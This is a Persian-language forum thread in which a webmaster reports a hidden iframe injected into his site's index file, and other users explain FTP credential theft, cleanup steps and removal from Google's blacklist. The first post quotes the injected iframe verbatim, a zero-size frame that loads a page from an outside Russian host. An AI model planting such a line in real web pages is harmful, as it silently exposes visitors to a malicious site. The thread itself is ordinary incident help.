سایتم ویروسی شد!

[amirepsilon]

سلام
دوستان این خط در انتهای فایل index بود :

<iframe frameborder="0" onload="if (!this.src){ this.src='http://plusbest.ru:8080/index.php'; this.height='0'; this.width='0';}" >ixnblysuqukuysmxbnvzewzroubftud</iframe>​

ظاهرا ویروس هست.

این ویروس ها از کجا سرایت میکنن ؟
چطور میشه جلوشونو گرفت ؟
چه خطری غیر از بالا نیومدن سایت دارن ؟
حالا راحش برای پاک سازی چیه ؟

ممنون

 

[foranyone]

تسلیت عرض می کنم

http://www.forum.majidonline.com/showthread.php?t=131216

 

[iman_ebru]

تسلیت عرض می کنم

http://www.forum.majidonline.com/showthread.php?t=131216

تسلیت!!؟؟؟

یک توضیح کلی: روشهای مختلفی برای نفوذ به سایت ها وجود داره. این روشها رو وب سرور، سیستم عامل سرور و عوامل دیگه تعیین میکنن!

اما در مورد مورد سایت شما: نرم افزار اتصال FTP شما آلوده هست و Username و Password سرور FTP شما رو در اختیار شخص یا سرور دیگه ای قرار داده و در هربار اتصال شما این اطلاعات به ایشون ارسال و سپس فایل های شما دستکاری میشن.

راه حل رفع این مشکل این هست که

اول: Username و Password سرور FTP خودتون رو تغییر بدید،

دوم: بعد نسبت به پاکسازی نرم افزار FTP Clinte خودتون اقدام کنید و به هیچ وجه از همون استفاده نکنید (پیشنهاد میکنم از آنتی تروجان های قوی استفاده کنید و درصورت عدم دسترسی یا موفقیت سیستم عاملتون رو دوباره نصب کرده و از یک Firewall قدرتمند استفاده کنید).

سوم: اگه Backup از فایل های سرور دارید فالهای شتیبان رو جایگزین فایلهای موجود کنید در غیر این صورت باید بصورت دستی تک تک فایل ها رو بررسی کنید (توضیح: ترجیها فایل هایی که در نام اونها کلمات index, main, default هست الوده شدند...)

نکته آخر: plusbest.ru یا سایت های دیگه ای که بصورت iframe در سایت شما فراخوانی شدند در لیست سیاه موتورهای جستجو (ترجیها گوگل) قرار دارند که منبع این لیست ها توسط http://stopbadware.org/ تهیه میشه و در صورتی که پیوند اونها در سایت شما باشه این موضوع موجب میشه سایت شما هم در لیست سیاه قرار بگیره که در صورتی که این اتفاق افتاده بفرمائید تا نحوه حذف یک سایت از لیست سیاه رو براتون توضیح بدم...

ایمان

 

[ziXet]

سایتم ویروسی شد!

تبریک میگم!

 

[amirepsilon]

بفرمائید تا نحوه حذف یک سایت از لیست سیاه رو براتون توضیح بدم...

ممنون میشم
بفرمایید

 

[iman_ebru]

همه چیز در اینجا و اینجا توضیح داده شده!!!

اما خلاصه اونا میشه اینکه:


نکته: قبل از انجام 4 مرحله ساده زیر باید سایتتون رو از وجود صفحاتی آلوده به همون لینکها و iFrame هایی که قبلا گفته شد پاکسازی کنید یا کلا اون صفحات رو حذف کنید...


1. وارد ابزارهای وبمستر گوگل شوید.

2. اگه قبلا سایت قرار گرفته در لیست سیاه رو در این قسمت ثبت نکرده اید توسط Add a site رو ثبت کنید.

3. سپس قسمت Verify ownership برای شما نشون داده میشه که در این قسمت روی Download this HTML verification file کلیک کنید و فایل HTML رو دریافت و در Public دایرکتوری سرورتون آپلود کنید. بصورتی که آدرسش www.YourSite.com/googlexxxxxx.html باشه.

4. بر روی کلید Verify کلیک کنید تا گوگل سایت شما رو مجددا بررسی بکنه که در صورت پاکسازی سایت توسط خودتون فکر میکنم تا 24 ساعت سایت شما از لیست سیاه خارج و به لیست Normal میگرده!!!

ایمان

 

[freelearn]

این مشکل برای منم پیش اومده بود.
راستی این به پرتال ربطی داره؟

 

[YTERROR]

راستی این به پرتال ربطی داره؟

نه ربطی نداره

تاپیک بدلیل تکراری بودن قفل شد ....